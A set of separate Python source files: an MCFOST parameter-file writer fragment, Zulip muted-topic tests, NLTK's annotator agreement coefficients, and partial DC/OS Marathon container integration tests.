'{:.3} '.format(float(self.grain3_porosity)) + '{:.3} '.format(float(self.grain3_mass_fract))+ '{:.3} '.format(float(self.grain3_vmax))
mcfost_file.write(values + ' Grain type (Mie or DHS), N_components, mixing rule (1 = EMT or 2 = coating),'+\
' porosity, mass fraction, Vmax (for DHS)\n')
values = ' ' + self.grain3_dust_file + ' {:.3} '.format(float(self.grain3_dust_volume))
mcfost_file.write(values + ' Optical indices file, volume fraction\n')
mcfost_file.write(' {:} '.format(int(self.grain3_heating_method)) + ' Heating method : 1 = RE + LTE, 2 = RE + NLTE, 3 = NRE\n')
values = ' {:.3} '.format(float(self.grain3_amin )) + '{:.3} '.format(float(self.grain3_amax)) +\
'{:.3} '.format(float(self.grain3_aexp)) + '{:} '.format(int(self.grain3_n_grains))
mcfost_file.write(values + ' amin, amax [mum], aexp, n_grains (log distribution)\n')
mcfost_file.write('\n')
# Molecular RT settings. This was fast! :)
mcfost_file.write('#Molecular RT settings\n'+\
' T T T 15. lpop, laccurate_pop, LTE, profile width (km.s^-1)\n'+\
' 0.2 v_turb (delta)\n'+\
' 1 nmol\n'+\
' co@xpol.dat 6 molecular data filename, level_max\n'+\
' 1.0 20 vmax (km.s^-1), n_speed\n'+\
' T 1.e-6 abundance.fits.gz cst molecule abundance ?, abundance, abundance file\n'+\
' T 3 ray tracing ?, number of lines in ray-tracing\n'+\
' 1 2 3 transition numbers\n')
mcfost_file.write('\n')
# Star properties
mcfost_file.write('#Star properties\n')
# star 1, always present
mcfost_file.write(' {:} '.format(int(self.n_stars)) +' Number of stars\n')
values = ' {:.3} '.format(float(self.star1_teff)) + '{:.3} '.format(float(self.star1_radius)) + '{:.3} '.format(float(self.star1_mass)) +\
' {:.3} '.format(float(self.star1_x)) + '{:.3} '.format(float(self.star1_y)) + '{:.3} '.format(float(self.star1_z)) + ' '+ self.star1_blackbody
mcfost_file.write(values + ' Temp, radius (solar radius),M (solar mass),x,y,z (AU), is a blackbody?\n')
mcfost_file.write(' ' + self.star1_spectrum +'\n')
values = ' {:.3} '.format(float(self.star1_fUV)) + '{:.3} '.format(float(self.star1_slopefUV))
mcfost_file.write(values + ' fUV, slope_fUV\n')
mcfost_file.close()
|
|
from datetime import datetime, timedelta, timezone
from typing import Any, Dict
from unittest import mock
from django.utils.timezone import now as timezone_now
from zerver.lib.stream_topic import StreamTopicTarget
from zerver.lib.test_classes import ZulipTestCase
from zerver.lib.topic_mutes import (
add_topic_mute,
get_topic_mutes,
remove_topic_mute,
topic_is_muted,
)
from zerver.models import UserProfile, UserTopic, get_stream
class MutedTopicsTests(ZulipTestCase):
def test_get_deactivated_muted_topic(self) -> None:
user = self.example_user("hamlet")
self.login_user(user)
stream = get_stream("Verona", user.realm)
recipient = stream.recipient
mock_date_muted = datetime(2020, 1, 1, tzinfo=timezone.utc).timestamp()
assert recipient is not None
add_topic_mute(
user_profile=user,
stream_id=stream.id,
recipient_id=recipient.id,
topic_name="Verona3",
date_muted=datetime(2020, 1, 1, tzinfo=timezone.utc),
)
stream.deactivated = True
stream.save()
self.assertNotIn((stream.name, "Verona3", mock_date_muted), get_topic_mutes(user))
self.assertIn((stream.name, "Verona3", mock_date_muted), get_topic_mutes(user, True))
def test_user_ids_muting_topic(self) -> None:
hamlet = self.example_user("hamlet")
cordelia = self.example_user("cordelia")
realm = hamlet.realm
stream = get_stream("Verona", realm)
recipient = stream.recipient
topic_name = "teST topic"
stream_topic_target = StreamTopicTarget(
stream_id=stream.id,
topic_name=topic_name,
)
user_ids = stream_topic_target.user_ids_muting_topic()
self.assertEqual(user_ids, set())
def mute_topic_for_user(user: UserProfile) -> None:
assert recipient is not None
add_topic_mute(
user_profile=user,
stream_id=stream.id,
recipient_id=recipient.id,
topic_name="test TOPIC",
date_muted=timezone_now(),
)
mute_topic_for_user(hamlet)
user_ids = stream_topic_target.user_ids_muting_topic()
self.assertEqual(user_ids, {hamlet.id})
hamlet_date_muted = UserTopic.objects.filter(user_profile=hamlet)[0].date_muted
self.assertTrue(timezone_now() - hamlet_date_muted <= timedelta(seconds=100))
mute_topic_for_user(cordelia)
user_ids = stream_topic_target.user_ids_muting_topic()
self.assertEqual(user_ids, {hamlet.id, cordelia.id})
cordelia_date_muted = UserTopic.objects.filter(user_profile=cordelia)[0].date_muted
self.assertTrue(timezone_now() - cordelia_date_muted <= timedelta(seconds=100))
def test_add_muted_topic(self) -> None:
user = self.example_user("hamlet")
self.login_user(user)
stream = get_stream("Verona", user.realm)
url = "/api/v1/users/me/subscriptions/muted_topics"
payloads = [
{"stream": stream.name, "topic": "Verona3", "op": "add"},
{"stream_id": stream.id, "topic": "Verona3", "op": "add"},
]
mock_date_muted = datetime(2020, 1, 1, tzinfo=timezone.utc).timestamp()
for data in payloads:
with mock.patch(
"zerver.views.muting.timezone_now",
return_value=datetime(2020, 1, 1, tzinfo=timezone.utc),
):
result = self.api_patch(user, url, data)
self.assert_json_success(result)
self.assertIn((stream.name, "Verona3", mock_date_muted), get_topic_mutes(user))
self.assertTrue(topic_is_muted(user, stream.id, "Verona3"))
self.assertTrue(topic_is_muted(user, stream.id, "verona3"))
remove_topic_mute(
user_profile=user,
stream_id=stream.id,
topic_name="Verona3",
)
def test_remove_muted_topic(self) -> None:
user = self.example_user("hamlet")
realm = user.realm
self.login_user(user)
stream = get_stream("Verona", realm)
recipient = stream.recipient
url = "/api/v1/users/me/subscriptions/muted_topics"
payloads = [
{"stream": stream.name, "topic": "vERONA3", "op": "remove"},
{"stream_id": stream.id, "topic": "vEroNA3", "op": "remove"},
]
mock_date_muted = datetime(2020, 1, 1, tzinfo=timezone.utc).timestamp()
assert recipient is not None
for data in payloads:
add_topic_mute(
user_profile=user,
stream_id=stream.id,
recipient_id=recipient.id,
topic_name="Verona3",
date_muted=datetime(2020, 1, 1, tzinfo=timezone.utc),
)
self.assertIn((stream.name, "Verona3", mock_date_muted), get_topic_mutes(user))
result = self.api_patch(user, url, data)
self.assert_json_success(result)
self.assertNotIn((stream.name, "Verona3", mock_date_muted), get_topic_mutes(user))
self.assertFalse(topic_is_muted(user, stream.id, "verona3"))
def test_muted_topic_add_invalid(self) -> None:
user = self.example_user("hamlet")
realm = user.realm
self.login_user(user)
stream = get_stream("Verona", realm)
recipient = stream.recipient
assert recipient is not None
add_topic_mute(
user_profile=user,
stream_id=stream.id,
recipient_id=recipient.id,
topic_name="Verona3",
date_muted=timezone_now(),
)
url = "/api/v1/users/me/subscriptions/muted_topics"
data: Dict[str, Any] = {"stream": stream.name, "topic": "Verona3", "op": "add"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Topic already muted")
data = {"stream_id": 999999999, "topic": "Verona3", "op": "add"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Invalid stream id")
data = {"topic": "Verona3", "op": "add"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Please supply 'stream'.")
data = {"stream": stream.name, "stream_id": stream.id, "topic": "Verona3", "op": "add"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Please choose one: 'stream' or 'stream_id'.")
def test_muted_topic_remove_invalid(self) -> None:
user = self.example_user("hamlet")
realm = user.realm
self.login_user(user)
stream = get_stream("Verona", realm)
url = "/api/v1/users/me/subscriptions/muted_topics"
data: Dict[str, Any] = {"stream": "BOGUS", "topic": "Verona3", "op": "remove"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Topic is not muted")
data = {"stream": stream.name, "topic": "BOGUS", "op": "remove"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Topic is not muted")
data = {"stream_id": 999999999, "topic": "BOGUS", "op": "remove"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Topic is not muted")
data = {"topic": "Verona3", "op": "remove"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Please supply 'stream'.")
data = {"stream": stream.name, "stream_id": stream.id, "topic": "Verona3", "op": "remove"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Please choose one: 'stream' or 'stream_id'.")
|
|
# Natural Language Toolkit: Agreement Metrics
#
# Copyright (C) 2001-2015 NLTK Project
# Author: Tom Lippincott <tom@cs.columbia.edu>
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
#
"""
Implementations of inter-annotator agreement coefficients surveyed by Artstein
and Poesio (2007), Inter-Coder Agreement for Computational Linguistics.
An agreement coefficient calculates the amount that annotators agreed on label
assignments beyond what is expected by chance.
In defining the AnnotationTask class, we use naming conventions similar to the
paper's terminology. There are three types of objects in an annotation task:
the coders (variables "c" and "C")
the items to be annotated (variables "i" and "I")
the potential categories to be assigned (variables "k" and "K")
Additionally, it is often the case that we don't want to treat two different
labels as complete disagreement, and so the AnnotationTask constructor can also
take a distance metric as a final argument. Distance metrics are simply
functions that take two arguments, and return a value between 0.0 and 1.0
indicating the distance between them. If not supplied, the default is binary
comparison between the arguments.
The simplest way to initialize an AnnotationTask is with a list of triples,
each containing a coder's assignment for one object in the task:
task = AnnotationTask(data=[('c1', '1', 'v1'),('c2', '1', 'v1'),...])
Note that the data list needs to contain the same number of triples for each
individual coder, containing category values for the same set of items.
Alpha (Krippendorff 1980)
Kappa (Cohen 1960)
S (Bennet, Albert and Goldstein 1954)
Pi (Scott 1955)
TODO: Describe handling of multiple coders and missing data
Expected results from the Artstein and Poesio survey paper:
>>> from nltk.metrics.agreement import AnnotationTask
>>> import os.path
>>> t = AnnotationTask(data=[x.split() for x in open(os.path.join(os.path.dirname(__file__), "artstein_poesio_example.txt"))])
>>> t.avg_Ao()
0.88
>>> t.pi()
0.7995322418977615...
>>> t.S()
0.8199999999999998...
This would have returned a wrong value (0.0) in @785fb79 as coders are in
the wrong order. Subsequently, all values for pi(), S(), and kappa() would
have been wrong as they are computed with avg_Ao().
>>> t2 = AnnotationTask(data=[('b','1','stat'),('a','1','stat')])
>>> t2.avg_Ao()
1.0
The following, of course, also works.
>>> t3 = AnnotationTask(data=[('a','1','othr'),('b','1','othr')])
>>> t3.avg_Ao()
1.0
"""
from __future__ import print_function, unicode_literals, division
import logging
from itertools import groupby
from operator import itemgetter
from nltk.probability import FreqDist, ConditionalFreqDist
from nltk.internals import deprecated
from nltk.compat import python_2_unicode_compatible, iteritems
from nltk.metrics.distance import binary_distance
log = logging.getLogger(__file__)
@python_2_unicode_compatible
class AnnotationTask(object):
"""Represents an annotation task, i.e. people assign labels to items.
Notation tries to match notation in Artstein and Poesio (2007).
In general, coders and items can be represented as any hashable object.
Integers, for example, are fine, though strings are more readable.
Labels must support the distance functions applied to them, so e.g.
a string-edit-distance makes no sense if your labels are integers,
whereas interval distance needs numeric values. A notable case of this
is the MASI metric, which requires Python sets.
"""
def __init__(self, data=None, distance=binary_distance):
"""Initialize an empty annotation task.
"""
self.distance = distance
self.I = set()
self.K = set()
self.C = set()
self.data = []
if data is not None:
self.load_array(data)
def __str__(self):
return "\r\n".join(map(lambda x:"%s\t%s\t%s" %
(x['coder'], x['item'].replace('_', "\t"),
",".join(x['labels'])), self.data))
def load_array(self, array):
"""Load the results of annotation.
The argument is a list of 3-tuples, each representing a coder's labeling of an item:
(coder,item,label)
"""
for coder, item, labels in array:
self.C.add(coder)
self.K.add(labels)
self.I.add(item)
self.data.append({'coder':coder, 'labels':labels, 'item':item})
def agr(self, cA, cB, i, data=None):
"""Agreement between two coders on a given item
"""
data = data or self.data
# cfedermann: we don't know what combination of coder/item will come
# first in x; to avoid StopIteration problems due to assuming an order
# cA,cB, we allow either for k1 and then look up the missing as k2.
k1 = next((x for x in data if x['coder'] in (cA,cB) and x['item']==i))
if k1['coder'] == cA:
k2 = next((x for x in data if x['coder']==cB and x['item']==i))
else:
k2 = next((x for x in data if x['coder']==cA and x['item']==i))
ret = 1.0 - float(self.distance(k1['labels'], k2['labels']))
log.debug("Observed agreement between %s and %s on %s: %f",
cA, cB, i, ret)
log.debug("Distance between \"%r\" and \"%r\": %f",
k1['labels'], k2['labels'], 1.0 - ret)
return ret
def Nk(self, k):
return float(sum(1 for x in self.data if x['labels'] == k))
def Nik(self, i, k):
return float(sum(1 for x in self.data if x['item'] == i and x['labels'] == k))
def Nck(self, c, k):
return float(sum(1 for x in self.data if x['coder'] == c and x['labels'] == k))
@deprecated('Use Nk, Nik or Nck instead')
def N(self, k=None, i=None, c=None):
"""Implements the "n-notation" used in Artstein and Poesio (2007)
"""
if k is not None and i is None and c is None:
ret = self.Nk(k)
elif k is not None and i is not None and c is None:
ret = self.Nik(i, k)
elif k is not None and c is not None and i is None:
ret = self.Nck(c, k)
else:
raise ValueError("You must pass either i or c, not both! (k=%r,i=%r,c=%r)" % (k, i, c))
log.debug("Count on N[%s,%s,%s]: %d", k, i, c, ret)
return ret
def _grouped_data(self, field, data=None):
data = data or self.data
return groupby(sorted(data, key=itemgetter(field)), itemgetter(field))
def Ao(self, cA, cB):
"""Observed agreement between two coders on all items.
"""
data = self._grouped_data('item', (x for x in self.data if x['coder'] in (cA, cB)))
ret = sum(self.agr(cA, cB, item, item_data) for item, item_data in data) / len(self.I)
log.debug("Observed agreement between %s and %s: %f", cA, cB, ret)
return ret
def _pairwise_average(self, function):
"""
Calculates the average of function results for each coder pair
"""
total = 0
n = 0
s = self.C.copy()
for cA in self.C:
s.remove(cA)
for cB in s:
total += function(cA, cB)
n += 1
ret = total / n
return ret
def avg_Ao(self):
"""Average observed agreement across all coders and items.
"""
ret = self._pairwise_average(self.Ao)
log.debug("Average observed agreement: %f", ret)
return ret
def Do_alpha(self):
"""The observed disagreement for the alpha coefficient.
The alpha coefficient, unlike the other metrics, uses this rather than
observed agreement.
"""
total = 0.0
for i, itemdata in self._grouped_data('item'):
label_freqs = FreqDist(x['labels'] for x in itemdata)
for j, nj in iteritems(label_freqs):
for l, nl in iteritems(label_freqs):
total += float(nj * nl) * self.distance(l, j)
ret = (1.0 / (len(self.I) * len(self.C) * (len(self.C) - 1))) * total
log.debug("Observed disagreement: %f", ret)
return ret
def Do_Kw_pairwise(self,cA,cB,max_distance=1.0):
"""The observed disagreement for the weighted kappa coefficient.
"""
total = 0.0
data = (x for x in self.data if x['coder'] in (cA, cB))
for i, itemdata in self._grouped_data('item', data):
# we should have two items; distance doesn't care which comes first
total += self.distance(next(itemdata)['labels'],
next(itemdata)['labels'])
ret = total / (len(self.I) * max_distance)
log.debug("Observed disagreement between %s and %s: %f", cA, cB, ret)
return ret
def Do_Kw(self, max_distance=1.0):
"""Averaged over all labelers
"""
ret = self._pairwise_average(lambda cA, cB: self.Do_Kw_pairwise(cA, cB, max_distance))
log.debug("Observed disagreement: %f", ret)
return ret
# Agreement Coefficients
def S(self):
"""Bennett, Albert and Goldstein 1954
"""
Ae = 1.0 / len(self.K)
ret = (self.avg_Ao() - Ae) / (1.0 - Ae)
return ret
def pi(self):
"""Scott 1955; here, multi-pi.
Equivalent to K from Siegel and Castellan (1988).
"""
total = 0.0
label_freqs = FreqDist(x['labels'] for x in self.data)
for k, f in iteritems(label_freqs):
total += f ** 2
Ae = total / ((len(self.I) * len(self.C)) ** 2)
return (self.avg_Ao() - Ae) / (1 - Ae)
def Ae_kappa(self, cA, cB):
Ae = 0.0
nitems = float(len(self.I))
label_freqs = ConditionalFreqDist((x['labels'], x['coder']) for x in self.data)
for k in label_freqs.conditions():
Ae += (label_freqs[k][cA] / nitems) * (label_freqs[k][cB] / nitems)
return Ae
def kappa_pairwise(self, cA, cB):
"""
"""
Ae = self.Ae_kappa(cA, cB)
ret = (self.Ao(cA, cB) - Ae) / (1.0 - Ae)
log.debug("Expected agreement between %s and %s: %f", cA, cB, Ae)
return ret
def kappa(self):
"""Cohen 1960
Averages naively over kappas for each coder pair.
"""
return self._pairwise_average(self.kappa_pairwise)
def multi_kappa(self):
"""Davies and Fleiss 1982
Averages over observed and expected agreements for each coder pair.
"""
Ae = self._pairwise_average(self.Ae_kappa)
return (self.avg_Ao() - Ae) / (1.0 - Ae)
def alpha(self):
"""Krippendorff 1980
"""
De = 0.0
label_freqs = FreqDist(x['labels'] for x in self.data)
for j in self.K:
nj = label_freqs[j]
for l in self.K:
De += float(nj * label_freqs[l]) * self.distance(j, l)
De = (1.0 / (len(self.I) * len(self.C) * (len(self.I) * len(self.C) - 1))) * De
log.debug("Expected disagreement: %f", De)
ret = 1.0 - (self.Do_alpha() / De)
return ret
def weighted_kappa_pairwise(self, cA, cB, max_distance=1.0):
"""Cohen 1968
"""
total = 0.0
label_freqs = ConditionalFreqDist((x['coder'], x['labels'])
for x in self.data
if x['coder'] in (cA, cB))
for j in self.K:
for l in self.K:
total += label_freqs[cA][j] * label_freqs[cB][l] * self.distance(j, l)
De = total / (max_distance * pow(len(self.I), 2))
log.debug("Expected disagreement between %s and %s: %f", cA, cB, De)
Do = self.Do_Kw_pairwise(cA, cB)
ret = 1.0 - (Do / De)
return ret
def weighted_kappa(self, max_distance=1.0):
"""Cohen 1968
"""
return self._pairwise_average(lambda cA, cB: self.weighted_kappa_pairwise(cA, cB, max_distance))
if __name__ == '__main__':
import re
import optparse
from nltk.metrics import distance
# process command-line arguments
parser = optparse.OptionParser()
parser.add_option("-d", "--distance", dest="distance", default="binary_distance",
help="distance metric to use")
parser.add_option("-a", "--agreement", dest="agreement", default="kappa",
help="agreement coefficient to calculate")
parser.add_option("-e", "--exclude", dest="exclude", action="append",
default=[], help="coder names to exclude (may be specified multiple times)")
parser.add_option("-i", "--include", dest="include", action="append", default=[],
help="coder names to include, same format as exclude")
parser.add_option("-f", "--file", dest="file",
help="file to read labelings from, each line with three columns: 'labeler item labels'")
parser.add_option("-v", "--verbose", dest="verbose", default='0',
help="how much debugging to print on stderr (0-4)")
parser.add_option("-c", "--columnsep", dest="columnsep", default="\t",
help="char/string that separates the three columns in the file, defaults to tab")
parser.add_option("-l", "--labelsep", dest="labelsep", default=",",
help="char/string that separates labels (if labelers can assign more than one), defaults to comma")
parser.add_option("-p", "--presence", dest="presence", default=None,
help="convert each labeling into 1 or 0, based on presence of LABEL")
parser.add_option("-T", "--thorough", dest="thorough", default=False, action="store_true",
help="calculate agreement for every subset of the annotators")
(options, remainder) = parser.parse_args()
if not options.file:
parser.print_help()
exit()
logging.basicConfig(level=50 - 10 * int(options.verbose))
# read in data from the specified file
data = []
with open(options.file, 'r') as infile:
for l in infile:
toks = l.split(options.columnsep)
coder, object_, labels = toks[0], str(toks[1:-1]), frozenset(toks[-1].strip().split(options.labelsep))
if ((options.include == options.exclude) or
(len(options.include) > 0 and coder in options.include) or
(len(options.exclude) > 0 and coder not in options.exclude)):
data.append((coder, object_, labels))
if options.presence:
task = AnnotationTask(data, getattr(distance, options.distance)(options.presence))
else:
task = AnnotationTask(data, getattr(distance, options.distance))
if options.thorough:
pass
else:
print(getattr(task, options.agreement)())
logging.shutdown()
|
|
"""This module contains tests which are supposed to run on both root Marathon and Marathon on Marathon (MoM)."""
import apps
import common
import groups
import os
import os.path
import pytest
import requests
import retrying
import scripts
import time
import logging
import shakedown.dcos.service
from shakedown.clients import dcos_service_url, marathon
from shakedown.clients.authentication import dcos_acs_token, DCOSAcsAuth
from shakedown.clients.rpcclient import verify_ssl
from shakedown.dcos.agent import get_private_agents, private_agents, restart_agent
from shakedown.dcos.command import run_command_on_agent, run_command_on_master
from shakedown.dcos.cluster import dcos_version_less_than, dcos_1_8, dcos_1_9, dcos_1_11, dcos_1_12, ee_version # NOQA F401
from shakedown.dcos.file import copy_file_to_master
from shakedown.dcos.marathon import deployment_wait, marathon_version_less_than
from shakedown.dcos.master import master_http_service
from shakedown.dcos.agent import required_private_agents # NOQA F401
from shakedown.dcos.service import get_service_task
from shakedown.dcos.task import wait_for_dns
from shakedown.errors import DCOSException
from shakedown.matcher import assert_that, eventually, has_len, has_value, has_values, prop
from precisely import contains_string, equal_to, not_
logger = logging.getLogger(__name__)
def test_launch_mesos_container():
"""Launches a Mesos container with a simple command."""
app_def = apps.mesos_app(app_id='/mesos-container-app')
app_id = app_def["id"]
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
app = client.get_app(app_id)
assert len(tasks) == 1, "The number of tasks is {} after deployment, but only 1 was expected".format(len(tasks))
assert app['container']['type'] == 'MESOS', "The container type is not MESOS"
def test_launch_docker_container():
"""Launches a Docker container on Marathon."""
app_def = apps.docker_http_server(app_id='/launch-docker-container-app')
app_id = app_def["id"]
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
app = client.get_app(app_id)
assert len(tasks) == 1, "The number of tasks is {} after deployment, but only 1 was expected".format(len(tasks))
assert app['container']['type'] == 'DOCKER', "The container type is not DOCKER"
def test_launch_mesos_container_with_docker_image():
"""Launches a Mesos container with a Docker image."""
app_def = apps.ucr_docker_http_server(app_id='/launch-mesos-container-with-docker-image-app')
app_id = app_def["id"]
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
assert_that(lambda: client.get_tasks(app_id),
eventually(has_len(equal_to(1)), max_attempts=30))
app = client.get_app(app_id)
assert app['container']['type'] == 'MESOS', "The container type is not MESOS"
# This fails on DC/OS 1.7, it is likely the version of Marathon in Universe for 1.7, is 1.1.5.
@dcos_1_8
def test_launch_mesos_grace_period(marathon_service_name):
"""Tests 'taskKillGracePeriodSeconds' option using a Mesos container in a Marathon environment.
Read more details about this test in `test_root_marathon.py::test_launch_mesos_root_marathon_grace_period`
"""
app_id = '/mesos-grace-period-app'
app_def = apps.mesos_app(app_id)
default_grace_period = 3
grace_period = 20
app_def['fetch'] = [{"uri": "https://downloads.mesosphere.com/testing/test.py"}]
app_def['cmd'] = '/opt/mesosphere/bin/python test.py'
app_def['taskKillGracePeriodSeconds'] = grace_period
task_name = app_id.lstrip('/')
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = get_service_task(marathon_service_name, task_name)
assert tasks is not None
client.scale_app(app_id, 0)
tasks = get_service_task(marathon_service_name, task_name)
assert tasks is not None
# tasks should still be here after the default_grace_period
time.sleep(default_grace_period + 1)
tasks = get_service_task(marathon_service_name, task_name)
assert tasks is not None
# but not after the set grace_period
time.sleep(grace_period)
tasks = get_service_task(marathon_service_name, task_name)
assert tasks is None
def test_launch_docker_grace_period(marathon_service_name):
"""Tests 'taskKillGracePeriodSeconds' option using a Docker container in a Marathon environment.
Read more details about this test in `test_root_marathon.py::test_launch_mesos_root_marathon_grace_period`
"""
app_id = '/launch-docker-grace-period-app'
app_def = apps.docker_http_server(app_id)
app_def['container']['docker']['image'] = 'kensipe/python-test'
default_grace_period = 3
grace_period = 20
app_def['taskKillGracePeriodSeconds'] = grace_period
app_def['cmd'] = 'python test.py'
task_name = app_id.lstrip('/')
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = get_service_task(marathon_service_name, task_name)
assert tasks is not None
client.scale_app(app_id, 0)
tasks = get_service_task(marathon_service_name, task_name)
assert tasks is not None
# tasks should still be here after the default_graceperiod
time.sleep(default_grace_period + 1)
tasks = get_service_task(marathon_service_name, task_name)
assert tasks is not None
# but not after the set grace_period
time.sleep(grace_period)
assert_that(lambda: get_service_task(marathon_service_name, task_name),
eventually(equal_to(None), max_attempts=30))
def test_docker_port_mappings():
"""Tests that Docker ports are mapped and are accessible from the host."""
app_def = apps.docker_http_server(app_id='/docker-port-mapping-app')
app_id = app_def["id"]
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
host = tasks[0]['host']
port = tasks[0]['ports'][0]
cmd = r'curl -s -w "%{http_code}"'
cmd = cmd + ' {}:{}/.dockerenv'.format(host, port)
status, output = run_command_on_agent(host, cmd)
assert status and output == "200", "HTTP status code is {}, but 200 was expected".format(output)
def test_docker_dns_mapping(marathon_service_name):
"""Tests that a running Docker task is accessible via DNS."""
app_def = apps.docker_http_server(app_id='/docker-dns-mapping-app')
app_id = app_def["id"]
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
bad_cmd = 'ping -c 1 docker-test.marathon-user.mesos-bad'
status, output = run_command_on_master(bad_cmd)
assert not status
@retrying.retry(wait_fixed=1000, stop_max_attempt_number=30, retry_on_exception=common.ignore_exception)
def check_dns():
dnsname = '{}.{}.mesos'.format(app_id.lstrip('/'), marathon_service_name)
cmd = 'ping -c 1 {}'.format(dnsname)
wait_for_dns(dnsname)
status, output = run_command_on_master(cmd)
assert status, "ping failed for app using DNS lookup: {}".format(dnsname)
check_dns()
def test_launch_app_timed():
"""Most tests wait until a task is launched with no reference to time.
This test verifies that if a app is launched on marathon that within 3 secs there is a task spawned.
"""
app_def = apps.mesos_app(app_id='/timed-launch-app')
app_id = app_def["id"]
client = marathon.create_client()
client.add_app(app_def)
# if not launched in 10 sec fail
assert_that(lambda: client.get_tasks(app_id),
eventually(has_len(equal_to(1)), max_attempts=10))
def test_ui_available(marathon_service_name):
"""Simply verifies that a request to the UI endpoint is successful if Marathon is launched."""
auth = DCOSAcsAuth(dcos_acs_token())
response = requests.get("{}/ui/".format(dcos_service_url(marathon_service_name)), auth=auth, verify=verify_ssl())
assert response.status_code == 200, "HTTP status code is {}, but 200 was expected".format(response.status_code)
def test_task_failure_recovers():
"""Tests that if a task is KILLED, another one will be launched with a different ID."""
app_def = apps.sleep_app(app_id='/task-failure-recovers')
app_def['cmd'] = 'sleep 1000'
app_id = app_def["id"]
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
old_task_id = tasks[0]['id']
host = tasks[0]['host']
common.kill_process_on_host(host, '[s]leep 1000')
assert_that(lambda: client.get_tasks(app_id)[0],
eventually(has_value('id', not_(equal_to(old_task_id))), max_attempts=30))
@pytest.mark.skipif("ee_version() == 'strict'")
def test_run_app_with_specified_user():
"""Runs an app with a given user (cnetos). CentOS is expected, since it has centos user by default."""
app_def = apps.sleep_app(app_id='/app-with-specified-user')
app_def['user'] = 'centos'
app_id = app_def['id']
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
task = tasks[0]
assert task['state'] == 'TASK_RUNNING', "The task is not running: {}".format(task['state'])
app = client.get_app(app_id)
assert app['user'] == 'centos', "The app's user is not centos: {}".format(app['user'])
@pytest.mark.skipif("ee_version() == 'strict'")
def test_run_app_with_non_existing_user():
"""Runs an app with a non-existing user, which should be failing."""
app_def = apps.sleep_app(app_id='/non-existing-user')
app_def['user'] = 'bad'
client = marathon.create_client()
client.add_app(app_def)
assert_that(lambda: client.get_app(app_def["id"]), eventually(
prop(['lastTaskFailure', 'message'], contains_string("No such user 'bad'")), max_attempts=30))
def test_run_app_with_non_downloadable_artifact():
"""Runs an app with a non-downloadable artifact."""
app_def = apps.sleep_app(app_id='/non-downloadable-artifact')
app_def['fetch'] = [{"uri": "http://localhost/missing-artifact"}]
client = marathon.create_client()
client.add_app(app_def)
assert_that(lambda: client.get_app(app_def["id"]), eventually(
prop(['lastTaskFailure', 'message'], contains_string("Failed to fetch all URIs for container")), max_attempts=30)) # NOQA E501
def test_launch_group():
"""Launches a group of 2 apps."""
group_def = groups.sleep_group()
groups_id = group_def["groups"][0]["id"]
app_id = group_def["groups"][0]["apps"][0]["id"]
client = marathon.create_client()
client.create_group(group_def)
deployment_wait(service_id=app_id)
group_apps = client.get_group(groups_id)
apps = group_apps['apps']
assert len(apps) == 2, "The numbers of apps is {} after deployment, but 2 is expected".format(len(apps))
@private_agents(2)
def test_launch_and_scale_group():
"""Launches and scales a group."""
group_def = groups.sleep_group()
groups_id = group_def["groups"][0]["id"]
app1_id = group_def["groups"][0]["apps"][0]["id"]
app2_id = group_def["groups"][0]["apps"][1]["id"]
client = marathon.create_client()
client.create_group(group_def)
deployment_wait(service_id=app1_id)
group_apps = client.get_group(groups_id)
apps = group_apps['apps']
assert len(apps) == 2, "The number of apps is {}, but 2 was expected".format(len(apps))
tasks1 = client.get_tasks(app1_id)
tasks2 = client.get_tasks(app2_id)
assert len(tasks1) == 1, "The number of tasks #1 is {} after deployment, but 1 was expected".format(len(tasks1))
assert len(tasks2) == 1, "The number of tasks #2 is {} after deployment, but 1 was expected".format(len(tasks2))
# scale by 2 for the entire group
client.scale_group(groups_id, 2)
deployment_wait(service_id=app1_id)
tasks1 = client.get_tasks(app1_id)
tasks2 = client.get_tasks(app2_id)
assert len(tasks1) == 2, "The number of tasks #1 is {} after scale, but 2 was expected".format(len(tasks1))
assert len(tasks2) == 2, "The number of tasks #2 is {} after scale, but 2 was expected".format(len(tasks2))
@private_agents(2)
def test_scale_app_in_group():
"""Scales an individual app in a group."""
group_def = groups.sleep_group()
groups_id = group_def["groups"][0]["id"]
app1_id = group_def["groups"][0]["apps"][0]["id"]
app2_id = group_def["groups"][0]["apps"][1]["id"]
client = marathon.create_client()
client.create_group(group_def)
deployment_wait(service_id=app1_id)
group_apps = client.get_group(groups_id)
apps = group_apps['apps']
assert len(apps) == 2, "The number of apps is {}, but 2 was expected".format(len(apps))
tasks1 = client.get_tasks(app1_id)
tasks2 = client.get_tasks(app2_id)
assert len(tasks1) == 1, "The number of tasks #1 is {} after deployment, but 1 was expected".format(len(tasks1))
assert len(tasks2) == 1, "The number of tasks #2 is {} after deployment, but 1 was expected".format(len(tasks2))
# scaling just one app in the group
client.scale_app(app1_id, 2)
deployment_wait(service_id=app1_id)
tasks1 = client.get_tasks(app1_id)
tasks2 = client.get_tasks(app2_id)
assert len(tasks1) == 2, "The number of tasks #1 is {} after scale, but 2 was expected".format(len(tasks1))
assert len(tasks2) == 1, "The number of tasks #2 is {} after scale, but 1 was expected".format(len(tasks2))
@private_agents(2)
def test_scale_app_in_group_then_group():
"""First scales an app in a group, then scales the group itself."""
group_def = groups.sleep_group()
